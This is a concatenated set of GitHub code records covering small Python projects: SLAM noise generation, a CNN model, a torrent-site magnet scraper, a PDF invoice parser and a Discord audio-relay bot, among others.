p1[2]\n\n\t\tT2_wN = np.dot(T1_wN, T2_1N)\n\n\t\t# Get x2', y2', z2', qx2', qy2', qz2', qw2'\n\t\tx2N, y2N, z2N = T2_wN[0, 3], T2_wN[1, 3], T2_wN[2, 3]\n\t\tqx2N, qy2N, qz2N, qw2N = list(R.from_matrix(T2_wN[0:3, 0:3]).as_quat())\n\n\t\tXN[i] = x2N; YN[i] = y2N; ZN[i] = z2N\n\t\tQxN[i] = qx2N; QyN[i] = qy2N; QzN[i] = qz2N; QwN[i] = qw2N\n\n\treturn (XN, YN, ZN, QxN, QyN, QzN, QwN)\n\n\n\nif __name__==\"__main__\":\n \n X, Y, Z, Qx, Qy, Qz, Qw, LDMK, measurement = get_traj()\n xN, yN, zN, QxN, QyN, QzN, QwN = addNoise(X, Y, Z, Qx, Qy, Qz, Qw)\n noise_ldmk = add_noise_ldmk(LDMK)\n \n write_initialisation(argv[1], X, Y, Z, Qx, Qy, Qz, Qw, LDMK, measurement)\n write_initialisation(argv[2], xN, yN, zN, QxN, QyN, QzN, QwN , noise_ldmk, measurement)","repo_name":"ayushsharma-crypto/SLAM-BO-G2O-GTSAM","sub_path":"Tutorial/gtsamFullSLAM_SE3/gen_info.py","file_name":"gen_info.py","file_ext":"py","file_size_in_byte":9113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39824357217","text":"from math import cos\r\n\r\nCONST = 100\r\n\r\ndef cosinus(x):\r\n res = 0\r\n x_st = 1\r\n n_factorial = 1\r\n \r\n for n in range(0,CONST):\r\n if n == 0:\r\n res+=1\r\n else:\r\n x_st *= x**2\r\n if n == 1:\r\n n_factorial = 2\r\n else:\r\n n_factorial *= (n+1) * (n+2)\r\n res+=((-1**n)/n_factorial) * x_st\r\n return res\r\n\r\nprint(cosinus(0.75))\r\nprint(cos(0.75))\r\n","repo_name":"Lammer322by/Hello-World","sub_path":"Autumn/custom_cosinus.py","file_name":"custom_cosinus.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11390414309","text":"import torch\nfrom torch import nn\n\nclass CnnModel(nn.Module):\n def __init__(self):\n super(CnnModel, self).__init__()\n # 첫번째층\n # ImgIn shape=(?, 28, 28, 1)\n # Conv -> (?, 28, 28, 32)\n # Pool -> (?, 14, 14, 32)\n self.layer1 = torch.nn.Sequential(\n torch.nn.Conv2d(1, 32, kernel_size=3, stride=1, padding=1),\n torch.nn.ReLU(),\n torch.nn.MaxPool2d(kernel_size=2, stride=2))\n\n # 두번째층\n # ImgIn shape=(?, 14, 14, 32)\n # Conv ->(?, 14, 14, 64)\n # Pool ->(?, 7, 7, 64)\n self.layer2 = torch.nn.Sequential(\n torch.nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1),\n torch.nn.ReLU(),\n torch.nn.MaxPool2d(kernel_size=2, stride=2))\n\n # 전결합층 7x7x64 inputs -> 10 outputs\n self.fc = torch.nn.Linear(7 * 7 * 64, 10, bias=True)\n\n # 전결합층 한정으로 가중치 초기화\n torch.nn.init.xavier_uniform_(self.fc.weight)\n\n # # 전결합층 한정으로 가중치 초기화\n # torch.nn.init.xavier_uniform_(self.fc.weight)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n\n # 전결합층을 위해서 Flatten\n out = out.view(out.size(0), -1) \n\n # 전결합층 Fully Connected\n out = self.fc(out)\n \n return out","repo_name":"donghquinn/cnn_mnist_test","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17350666073","text":"def troca(l, i, j):\n aux = l[i]\n l[i] = l[j]\n l[j] = aux\n\n\ndef perms(l, pos=0):\n if pos == len(l) - 1:\n print(l)\n else:\n for i in range(pos, len(l)):\n troca(l, pos, i)\n perms(l, pos+1)\n troca(l, pos, i)\n\n\ndef main():\n l = [1, 2, 3]\n perms(l)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"matheustxaguiar/Programming-Period-2","sub_path":"Recursive Functions/permutacao.py","file_name":"permutacao.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7552881892","text":"# \t30616KB\t148ms\na = [0]*8\nused = [False]*9\ndef func(n, m, cnt):\n if m == cnt:\n print(' '.join(map(str, a[0:m])))\n for i in range(1, n+1):\n if used[i]:\n continue\n used[i] = True\n a[cnt] = i\n func(n, m, cnt+1)\n used[i] = False\nn, m = map(int, input().split())\nfunc(n, m, 0)","repo_name":"lilble/baekjoon","sub_path":"15649/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42939845213","text":"# userInput = input(\"Insert you name: \")\n# welcomeMessage = f\"Welcome to my store {userInput} here is the list of our items\"\n# lengthMessage = len(welcomeMessage)\n# print(\"*\"*lengthMessage)\n# print(welcomeMessage)\n# list = \"a.Fruits\\nb.Dairy\\nc.Spices\\nd.Paper Wrap\\nc.Toiletry\\nd.Vegetables\\ne.Frozen Food\\nf.Canned Goods\\ng.Pet Items\" \\\n# \"\\nh.Household\\ni.Cereal\\nj.Pasta/Rice\\nk.Breads\\nl.Baking\\nm.Beverages\\nn.Meat/Fish\\no.Condiments\\np.Sauces/Oils\\nq.Snacks\"\n# print(list)\nimport re\nimport long_response as long\ndef message_probability(user_message,recognised_words, single_response=False, required_words=[]):\n message_certainty = 0\n has_required_words = True\n\n for word in user_message:\n if word in recognised_words:\n message_certainty += 1\n percentage = float(message_certainty) / float(len(recognised_words))\n\n for word in required_words:\n if word not in user_message:\n has_required_words = False\n break\n\n if has_required_words or single_response:\n return int(percentage*100)\n else:\n return 0\n\ndef check_all_messages(message):\n highest_prob_list = {}\n\n def response(bot_response, list_of_words, single_response = False, required_words ={}):\n nonlocal highest_prob_list\n highest_prob_list[bot_response] = message_probability(message, list_of_words, single_response, required_words)\n\n response('Hello!', ['hello', 'hi', 'sup', 'hey', 'heyo'], single_response = True)\n response('I\\'m doing fine, and you?', ['how', 'are', 'you', 'doing'], required_words=['how'])\n\n best_match = max(highest_prob_list, key=highest_prob_list.get())\n print(highest_prob_list)\n\n return best_match\n\ndef get_response(user_input):\n split_message = re.split(r'\\s+|[,;?!.-]\\s*', user_input.lower())\n response = check_all_messages(split_message)\n return response\n\nwhile True:\n print('Bot: ' + get_response(input('You: ')))","repo_name":"Yawner23/chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34683014015","text":"from os import system\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef koszon(nev:str, napszak:str) -> None:\r\n print(f'Szia {nev}!')\r\n valasz:str = input(f'Hogy vagy ma {napszak}?')\r\n if 'jól' in valasz:\r\n print(f'Na az jó {nev}!')\r\n elif 'szarul' in valasz:\r\n print(f'Az szar, {nev} :(')\r\n else: print('ok')\r\n\r\n\r\ndef kerdes() -> bool: \r\n rszam:int = randint(1, 10)\r\n ered:int = int(input(f'Mennyi {rszam} négyzete? '))\r\n if rszam ** 2 == ered:\r\n return True\r\n else:\r\n return False\r\n\r\ndef befejezes(nev:str) -> None:\r\n print(f'Rendben {nev}, mára végeztünk!')\r\n print('Viszontlátásra! ')\r\n for x in range(3):\r\n print(end=f'{3 - x}')\r\n for y in range(3):\r\n print(end= '.')\r\n sleep(.5)\r\n system('cls')\r\n\r\n","repo_name":"MarkCsiha/practice","sub_path":"0421_python/Új mappa/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74006219452","text":"import bs4\nimport requests\nimport re\nimport time\nimport pymongo\nimport guessit\nfrom configparser import ConfigParser\nimport help_routines\n\nparser = ConfigParser()\nparser.read('config.ini')\n\ncategory_list = set()\ncategory_list.add('TV')\ncategory_list.add('Movies')\n\n\ndef scrape_mblock(movie_block):\n movieb_data = {}\n\n divs = movie_block.findAll('div', {'class', 'dltorrent'})\n magnets = set()\n for div in divs:\n As = div.findAll('a')\n for a in As:\n href = a.get('href')\n if href.startswith('magnet:'):\n magnets.add(href)\n\n try:\n name = movie_block.find('div', {'id': 'content'}).find('h1').text\n movieb_data['name'] = name\n info = guessit.guessit(name)\n movieb_data['title'] = info['title']\n except:\n return False, None\n\n try:\n movieb_data['seeds'] = str(\n movie_block.find('span', {'class': 'greenish'}).text)\n except:\n movieb_data['seeds'] = None\n\n try:\n movieb_data['leeches'] = str(\n movie_block.find('span', {'class': 'reddish'}).text)\n except:\n movieb_data['leeches'] = None\n\n return movieb_data, list(magnets)\n\n\ndef scrape_this(root_url, ll, sitemap_file):\n\n pages = []\n to_scrap = []\n\n for l in ll:\n url = root_url % (l,)\n to_scrap.append(url)\n\n print(\"Going over XMLs...\")\n for url in help_routines.sample(to_scrap, parser.getint('limetorrents', 'to_scrap')): #XXX to_scrap\n print(url)\n source = requests.get(url).text\n soup = bs4.BeautifulSoup(source, 'xml')\n sitemap = soup.findAll('loc')\n for loc in sitemap:\n pages.append(loc.text)\n\n print(\"going over pages\", len(pages))\n\n hash_re = re.compile('btih:([0-9|A-Z|a-z]*)&.*')\n\n client = pymongo.MongoClient()\n cdb = client['magnets']\n\n mondb = cdb.magnets\n err_count = 0\n for url in help_routines.sample(pages, parser.getint('limetorrents', 'pages')): #XXX pages\n\n print(url)\n source = requests.get(url).text\n soup = bs4.BeautifulSoup(source, 'html.parser')\n\n map, magnets = scrape_mblock(soup)\n if not map:\n continue\n\n for magnet in magnets:\n m = hash_re.search(magnet)\n hash = m.group(1).upper()\n map['_id'] = hash\n map['magnet'] = magnet\n try:\n mondb.insert_one(map)\n except pymongo.errors.DuplicateKeyError:\n err_count += 1\n\n time.sleep(0.1)\n\nscrape_this(\"https://limetorrents.info/sitemaps/allsitemap%d.xml\", range(1, 328), 'limetorrents.pages.txt')\n\n","repo_name":"dineshgayathri/indexsample","sub_path":"crawler.limetorrents.py","file_name":"crawler.limetorrents.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4516988180","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n def __str__(self):\n return str(self.data)\n\nclass Queue:\n def __init__(self):\n self.items = []\n\n def is_empty(self):\n return len(self.items) == 0\n\n def size(self):\n return len(self.items)\n\n def enqueue(self, data):\n self.items.append(data)\n\n def dequeue(self):\n if not self.is_empty():\n return self.items.pop(0)\n\nclass BST:\n def __init__(self):\n self.root = None\n\n def insert(self, data):\n if self.root is None:\n self.root = Node(data)\n else:\n curr = self.root\n while True:\n if data < curr.data:\n if curr.left is None:\n curr.left = Node(data)\n break\n curr = curr.left\n else:\n if curr.right is None:\n curr.right = Node(data)\n break\n curr = curr.right\n return self.root\n\n def max(self):\n if self.root is None:\n return\n curr = self.root\n while curr.right is not None:\n curr = curr.right\n return curr.data\n\n def min(self):\n if self.root is None:\n return\n curr = self.root\n while curr.left is not None:\n curr = curr.left\n return curr.data\n\n def mult(self, k, multiplier): # traverse then multiply\n q = Queue()\n q.enqueue(self.root)\n while not q.is_empty():\n curr = q.dequeue()\n if curr.data > k:\n curr.data = curr.data*multiplier\n if curr.left is not None:\n q.enqueue(curr.left)\n if curr.right is not None:\n q.enqueue(curr.right)\n\n def print_tree(self, node, level=0):\n if node is not None:\n self.print_tree(node.right, level + 1)\n print(' ' * level, node)\n self.print_tree(node.left, level + 1)\n\n\nif __name__ == '__main__':\n T = BST()\n inp = input('Enter Input : ').split('/')\n lst = list(map(int, inp[0].split()))\n k = int(inp[1])\n # print(lst, k)\n root = None\n for item in lst:\n root = T.insert(item)\n T.print_tree(root)\n print('--------------------------------------------------')\n T.mult(k, 3)\n T.print_tree(root)","repo_name":"ApexTone/DataStructAlgo-Grader-KMITL","sub_path":"Week7/MultiplyTree.py","file_name":"MultiplyTree.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"34247694012","text":"# https://atcoder.jp/contests/abc175/tasks/abc175_b\n\nn = int(input())\nl = list(map(int, input().split()))\n\nans = 0\nfor i in l:\n for j in l:\n for k in l:\n h = [i, j, k]\n if i != j and i != k and j != k:\n h.sort()\n if h[0] + h[1] > h[2]:\n ans += 1\nprint(ans // 6)\n","repo_name":"hy-sksem/AtCoder","sub_path":"ABC/175_B_MakingTriangle.py","file_name":"175_B_MakingTriangle.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39671290902","text":"rule1 = (\"p= Manolo es cariñoso\", \"q= Manolo es amable\")\r\n\r\nfact1 = (\"p\",)\r\n#definir la meta \r\ngoal1 = (\"q\",)\r\n\r\n#Combinar la regla y el hecho para comprobar el gol\r\nif set(rule1).issubset(set(fact1)):\r\n print(\"La regla y el hecho combinados cumplen el objetivo\")\r\nelse:\r\n print(\"La regla y el hecho combinados no cumplen el objetivo\")\r\n","repo_name":"TuGorditoSensualon16/PythonPracticas","sub_path":"cláusulasdeHorn.py","file_name":"cláusulasdeHorn.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32769226896","text":"import cv2\n\nimagen = cv2.imread(\"img.png\")\n\n#Redimensionar\n# Sintaxis red = cv2.resize(imagen, fx=factor en x, fy=factor en y, tipo de interpolacion)\n\n#Red 1\nred1 = cv2.resize(imagen, None, fx=1.5, fy=1.5)\n\n#Red 2\nred2 = cv2.resize(imagen, None, fx=1.5, fy=1.5, interpolation= cv2.INTER_AREA)\n\n#Red 3\nred3 = cv2.resize(imagen, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)\n\n#Red 4\nancho = 400\nalto = 500\ntam = (ancho,alto)\nred4 = cv2.resize(imagen, tam, interpolation=cv2.INTER_CUBIC)\n\n#Mostramos el recorte\ncv2.imshow('Imagen original', imagen)\ncv2.imshow('Redimension 1', red1)\ncv2.imshow('Redimension 2', red2)\ncv2.imshow('Redimension 3', red3)\ncv2.imshow('Redimension 4', red4)\n\ncv2.waitKey(0)\n","repo_name":"MarianAlpha/VisionArtificial","sub_path":"Clase 2/Redimencianar.py","file_name":"Redimencianar.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29082347869","text":"def solution(n, a , b):\n tmp = a //2 + a%2\n tmp2 = b //2 + b%2\n cnt = 1\n while tmp != tmp2:\n cnt= cnt + 1\n tmp = tmp //2 + tmp%2\n tmp2 = tmp2 //2 + tmp2%2\n if tmp == tmp2:\n return cnt\n return cnt\n","repo_name":"algorithm-maintain-box/Programers","sub_path":"sejin/level_2/예상 대진표.py","file_name":"예상 대진표.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7361905274","text":"# For when you can't tell which Pico you're connected to...\n\nfrom machine import Pin\nfrom time import sleep\n\ndef blink(times: int = 1):\n print(f\"Blinking LED {times} times\")\n for _ in range(times):\n led = Pin(\"LED\", Pin.OUT)\n led.on()\n sleep(1)\n led.off()\n\n\nblink()","repo_name":"Jcros214/QuizBox0.5_micropython","sub_path":"blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74237778170","text":"import audioop, collections, threading\nimport sounddevice as sd\nimport asyncio, discord\nimport logging\n\nimport settings as settingsModule\n\nlog = logging.getLogger(__name__)\n\nclass MockFile(discord.AudioSource):\n \"\"\"\n This is a mock file that will buffer output from a sounddevice recording.\n If not playing, output will not buffered to save RAM\n \"\"\"\n def __init__(self):\n self.buffer = collections.deque(bytearray(), maxlen=960000) # Limit to ~100kB just in case it's left playing\n self.event = threading.Event()\n self.rateData = None\n print(\"MockFile Initiated\")\n\n self.playing = False # If this is false, nothing is actually buffered\n\n def play(self):\n \"\"\" Begins recording audio and clears the buffer \"\"\"\n print(\"Playing\")\n self.playing = True\n self.buffer.clear() # Clear any existing buffer so there is as little latency as possible\n\n def stop(self):\n \"\"\" Stops recording from the buffer \"\"\"\n print(\"Stopping\")\n self.playing = False\n\n def callback(self, indata, frames, time, status):\n \"\"\" callback function to give to the sounddevice \"\"\"\n self.write(indata.copy(order=\"C\"))\n\n def read(self, numBytes: int or None=3840) -> bytes:\n \"\"\"\n A stream player may read from this to get a sample of the audio\n NOTE: This must return bytes, not a bytearray because the encoder silently fails if you pass anything but bytes\n :param numBytes: The number of bytes to read. Note: If the number of bytes requested is not a multiple of byte width * channels, data will be malformed\n :return: A bytes object containing the oldest requested bytes from the buffer\n \"\"\"\n if not self.playing: # If a read is requested but we're paused, play to avoid deadlock\n self.play()\n if type(numBytes) == int and numBytes < 0:\n numBytes = None\n toRet = bytearray() # Buffer to put desired bytes into\n while True:\n try:\n toRet.append(self.buffer.popleft())\n if numBytes and len(toRet) >= numBytes:\n return bytes(toRet)\n except IndexError: # Occurs when there's a pop from an empty buffer\n if not numBytes:\n return bytes(toRet)\n else: # If we don't have the requisite number of bytes, wait for more to be written\n #print(\"Out of bytes and waiting!\")\n self.event.clear() # This will likely be set originally, so clear it to indicate we are waiting for more bytes\n self.event.wait()\n\n def write(self, data):\n \"\"\"\n Writes binary int16 data to the buffer. Buffer is FIFO. Does not write if not playing\n :param data: The binary data to extend the buffer by.\n \"\"\"\n #print(\"Writing data!\", len(data), len(self.buffer))\n # Arguments are:\n # data: Binary PCM fragment to change sample rate of\n # width: byte width - We set our dtype in recording to int16 because discord expects PCM_16. 16 bits = 2 bytes\n # channels: How many channels per frame. Discord expects stereo = 2 and our audio device has 2, so it's good\n # input rate: Our audio device records at 44.1 kHz\n # output rate: discord expects 48 kHz\n # stream data: ratecv maintains some state between calls to this, so we record this data for it.\n data, self.rateData = audioop.ratecv(data, 2, 2, 44100, 48000, self.rateData)\n if self.playing: # Note, we do the audioop.ratecv regardless to update rateData\n self.buffer.extend(data)\n self.event.set()\n\nsettings = settingsModule.discord\nsettings.newSetting(\n {\n \"id\": \"botToken\",\n \"hidden\": True\n },\n {\n \"id\": \"gamePlaying\",\n \"type\": dict,\n \"default\": {\"name\": \"We playin DnD Bois!\", \"type\": 0}\n },\n {\n \"id\": \"voiceChannel\",\n \"type\": int,\n \"hidden\": True\n },\n {\n \"id\": \"commandChar\",\n \"default\": \"^\",\n \"verify\": lambda x: len(x) == 1\n },\n)\n\n\nclass MyClient(discord.Client):\n defaultIntents = discord.Intents.default()\n def __init__(self, audioFile: MockFile, recordStream, *args, **kwargs):\n super().__init__(*args, intents=self.defaultIntents, **kwargs)\n self.audioFile = audioFile\n self.recordStream = recordStream\n self.channel: discord.VoiceChannel = None # Voice channel that we are to connect to\n self.vc: discord.VoiceClient = None # Voice Client object of the currently connected channel\n\n def _callCoro(self, coro):\n asyncio.get_event_loop().call_soon_threadsafe(asyncio.ensure_future(coro))\n\n async def updateChannel(self, channel: discord.VoiceChannel):\n if type(channel) == int:\n channel = self.get_channel(channel)\n if not channel: # Indicates the channel no longer exists, or we have no permissions\n return log.error(\"Channel no longer exists to join\")\n else: # If we aren't updating from string, change our saved string\n settings[\"voiceChannel\"] = channel.id\n settingsModule.save()\n self.channel = channel\n if self.vc and self.vc.channel != channel:\n await self.vc.move_to(channel)\n else:\n await self.createVoiceClient()\n\n async def on_ready(self):\n log.info(f'Logged on as {self.user}!'.format(self.user))\n #if not discord.opus.is_loaded():\n # discord.opus.load_opus('libopus-0.x86.dll')\n if settings[\"voiceChannel\"]: # If we have a saved voice channel, connect immediately\n log.info(\"Connecting to stored voice channel\")\n await self.updateChannel(settings[\"voiceChannel\"])\n else:\n log.info(\"No voice channel saved, type '{}initialize' while connected to a voice channel\".format(settings[\"commandChar\"]))\n\n await self.changeGame(**settings[\"gamePlaying\"], save=False)\n\n async def on_message(self, message):\n if message.content.startswith(settings[\"commandChar\"]):\n if message.content[1:] == \"initialize\":\n if message.author.channel:\n log.info(\"Set new voice channel for future use:\"+message.author.channel.id)\n await message.channel.send(\"New Voice Channel Set!\")\n await self.updateChannel(message.author.channel)\n else:\n log.info(\"Tried setting new voice channel, but user was not connected to one\")\n await message.channel.send(\"You must be connected to a voice channel to initialize!\")\n elif message.content[1:] == \"connect\":\n await self.createVoiceClient()\n elif message.content[1:] == \"disconnect\":\n await self.disconnectVoiceClient()\n elif message.content[1:] == \"pause\":\n self.pause()\n elif message.content[1:] == \"set game\":\n log.info(\"Setting new presence\")\n await message.channel.send(\"Waiting for new game title\")\n newName = await self.wait_for(\"message\", timeout=10, check=lambda m: message.author == m.author)\n newName = newName.content if newName else settings[\"gamePlaying\"][\"name\"]\n await self.changeGame(newName)\n\n async def changeGame(self, name=None, type=discord.ActivityType.playing, save=True):\n log.info(f\"Changing game presence to '{name}' with type {type}\")\n settings[\"gamePlaying\"] = {\"name\": name, \"type\": int(type)}\n if name:\n await self.change_presence(activity=discord.Activity(name=name, type=type))\n if save:\n settingsModule.save()\n\n def async_changeGame(self, *args, **kwargs):\n \"\"\" Puts this into the loop and returns \"\"\"\n self._callCoro(self.changeGame(*args, **kwargs))\n\n async def createVoiceClient(self):\n if not self.vc or not self.vc.is_connected():\n log.debug(\"Creating new voice client!\")\n log.debug(\"Awaiting voice channel\")\n self.vc = await self.channel.connect()\n log.debug(\"Voice channel acquired, making player\")\n self.vc.play(self.audioFile)\n log.debug(\"Starting player!\")\n\n async def disconnectVoiceClient(self):\n if self.vc and self.vc.is_connected():\n log.info(\"Disconnecting voice client\")\n await self.vc.disconnect()\n self.audioFile.stop() # Stop recording audio, so it's crisp when we read again\n\n def pause(self):\n if self.vc and self.vc.is_connected():\n if self.vc.is_playing():\n log.info(\"Pausing Self\")\n self.vc.pause()\n self.audioFile.stop()\n else:\n log.info(\"Resuming Self\")\n self.vc.resume() # Should automatically start audioFile when we first read\n\n def async_logout(self):\n self._callCoro(self.close())\n\ndef start():\n print(discord.version_info)\n\n # Load settings\n settingsModule.loadInitial()\n if not settings[\"botToken\"]:\n import os, sys, webbrowser\n print(\"Bot token not found! Please follow the next instructions to make a new bot. Press enter when ready (or press 'n' to skip)\")\n val = input(\"... \")\n if val != \"n\":\n webbrowser.open(\"https://twentysix26.github.io/Red-Docs/red_guide_bot_accounts/#creating-a-new-bot-account\")\n print(\"Please copy the bot token. A file will open, paste it there, save, and close.\")\n print(\"Press enter when ready\")\n input(\"... \")\n filename = settingsModule.getFile(\"temp.txt\")\n os.system(f\"notepad {filename}\")\n with open(filename) as file:\n settings[\"botToken\"] = file.read().strip()\n os.remove(filename)\n settingsModule.save()\n\n cableName, cableInputChannels = \"CABLE Output (VB-Audio Virtual Cable)\", 2\n\n log.debug(\"Making input stream\")\n log.debug(f\"Searching for cable with name '{cableName}' and input channels #{cableInputChannels}\")\n mockFile = MockFile() # Make our mock file buffer. It will be ignoring input until specifically told to play\n for deviceNum, device_info in enumerate(sd.query_devices()):\n if device_info[\"name\"] == cableName and device_info[\"max_input_channels\"] == cableInputChannels:\n break\n else: # If we do not break - e.g. we did not find the audio cable\n string = \"VB Audio Cable Not Found! Did you install the drivers correctly?\"\n log.error(string)\n raise RuntimeError(string)\n\n stream = sd.InputStream(samplerate=int(device_info['default_samplerate']), device=deviceNum,\n channels=2, callback=mockFile.callback, dtype=\"int16\")\n stream.start() # Begin recording to the mock file. Note: This cannot be called in any thread but the main python thread. Otherwise the underlying library errors\n log.info(\"Started cable input stream\")\n\n\n client = MyClient(mockFile, stream)\n clientLoop = asyncio.new_event_loop()\n\n def run():\n asyncio.set_event_loop(clientLoop)\n client.run(settings[\"botToken\"])\n\n thread = threading.Thread(target=run, daemon=True)\n thread.start()\n\n return client, thread, clientLoop # Return these for use with other parts of the program","repo_name":"civilwargeeky/DiscordDMHelper","sub_path":"src/botDiscord.py","file_name":"botDiscord.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"6364404855","text":"import cv2\nimport numpy as np\n\n# OpenCV的Canny边缘检测算法\n# 1,使用高斯滤波平滑图像,减少图像中噪声。\n# 2,计算图像中每个像素的梯度方向和幅值。\n# 3,应用非极大值抑制算法消除边缘检测带来的杂散响应。\n# 4,应用双阈值法划分强边缘和弱边缘。\n# 5,消除孤立的弱边缘。\nimg = cv2.imread(\"../images//planet_glow.jpg\", cv2.IMREAD_GRAYSCALE)\ncanny_img = cv2.Canny(img, 200, 300)\ncv2.imshow(\"canny\", canny_img)\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"L-Jac/image-processing","sub_path":"chapter03/canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15926426739","text":"# 数据前处理的代码重复部分略去\n# 构建CART决策树模型\nfrom sklearn.tree import DecisionTreeClassifier\n\ntreefile = '/Users/Mac/Desktop/tree.pkl'\ntree = DecisionTreeClassifier()\ntree.fit(train[:,:3],train[:,3])\n\nfrom sklearn.externals import joblib\njoblib.dump(tree, treefile) # 这里使用joblib模块来保存模型数据\n\nfrom cm_plot import *\ncm_plot(train[:,3], tree.predict(train[:,:3])).show()\n\n\n# 数据前处理部分略去\n#模型测试\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\nfrom sklearn.externals import joblib\n\ntree = joblib.load('/Users/Mac/Desktop/tree.pkl')\n\nfpr, tpr, thresholds = roc_curve(test[:,3], tree.predict_proba(test[:,:3])[:,1],pos_label=1)\nplt.plot(fpr, tpr, linewidth = 2, label = 'ROC of CART')\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.ylim(0, 1.05)\nplt.xlim(0, 1.05)\nplt.legend(loc=4)\nplt.show()\n","repo_name":"dongyingdepingguo/Practice","sub_path":"电力窃漏用户自动识别/CART_model_test.py","file_name":"CART_model_test.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"74176797053","text":"import re\nimport pdfplumber\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport csv\n\n\"\"\"\ndate = report[1]\nhawb = report[2]\nmawb = report[3]\ndest = report[4]\nchargeable = report[5]\ncharges = report[6]\nunit_price = report[7]\npackages = report[8]\nweight = report[9]\n\"\"\"\ndef read_pdf_as_text(file_name):\n pdf = pdfplumber.open(file_name)\n page = pdf.pages[0]\n text = page.extract_text()\n pdf.close()\n return text\n\ndef parse_report(text):\n d = {}\n\n lines = text.splitlines()\n date_and_invoice = lines[2].split()\n d[1] = date_and_invoice[0]\n d[2] = date_and_invoice[1]\n \n # AWB number\n awb_line = lines[4]\n d[3] = awb_line.split()[-1]\n \n # Destination\n dest_line = \"\"\n \n desc = \"\"\n x_ray_line = \"\"\n hawb_line = \"\"\n for i, l in enumerate(lines):\n if 'X-RAY' in l:\n x_ray_line = l.split()\n elif 'HAWB' in l:\n hawb_line = l.split()\n elif 'Transport' in l:\n desc = l.split()\n elif 'Origin Destination Currency' in l:\n dest_line = lines[i+1].split()\n \n if desc:\n # 5 6 7 10 11\n d[10] = desc[2]\n d[11] = desc[6]\n d[5] = desc[7]\n d[6] = desc[8]\n d[7] = desc[-1]\n \n if dest_line:\n d[4] = ' '.join(dest_line[-3:-1])\n\n \n if x_ray_line:\n d[8] = x_ray_line[-1]\n \n if hawb_line:\n d[9] = hawb_line[-1]\n \n # total\n total_line = lines[-1].split()\n d[12] = total_line[1]\n \n return d\n \ndef run():\n text = read_pdf_as_text('input/invoice_210203V5802.pdf')\n print(text)\n report = parse_report(text)\n print(report)\n\ndef eval_folder(folder='input'):\n onlyfiles = [join(folder, f) for f in listdir(folder) if isfile(join(folder, f))]\n reports = []\n for f in onlyfiles:\n print('Processing..', f)\n report = parse_report(read_pdf_as_text(f))\n print(report)\n reports.append(report)\n \n return reports\n\ndef csv_writer(reports):\n with open('output/result.csv', \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n # write headers\n header = ['日期','Invoice No.','总运单号','清关公司','Chargable Weight','单价',\n 'Freight', 'X-RAY', '额外费用', '麻袋数', '毛重', '费用']\n writer.writerow(header)\n \n # contents\n for report in reports:\n l = []\n for i in range(1, 13):\n if i in report:\n l.append(report[i])\n else:\n l.append('N/A')\n \n # writerow requires a list\n writer.writerow(l)\n \nreports = eval_folder()\ncsv_writer(reports)\n\n#run()","repo_name":"gigimushroom/PDF-to-excel","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17359895465","text":"from datetime import timedelta\n\nfrom django import forms\nfrom django.utils import timezone\n\nfrom .dates import date_name\nfrom .models import Meal\n\n\nINGREDIENT_CHOICES = (\n (\"have\", \"Got it\"),\n (\"need\", \"Need it\"),\n)\n\n\nclass InvalidFormError(Exception):\n \"\"\"Error for attempting to access properties on an invalid form.\"\"\"\n\n 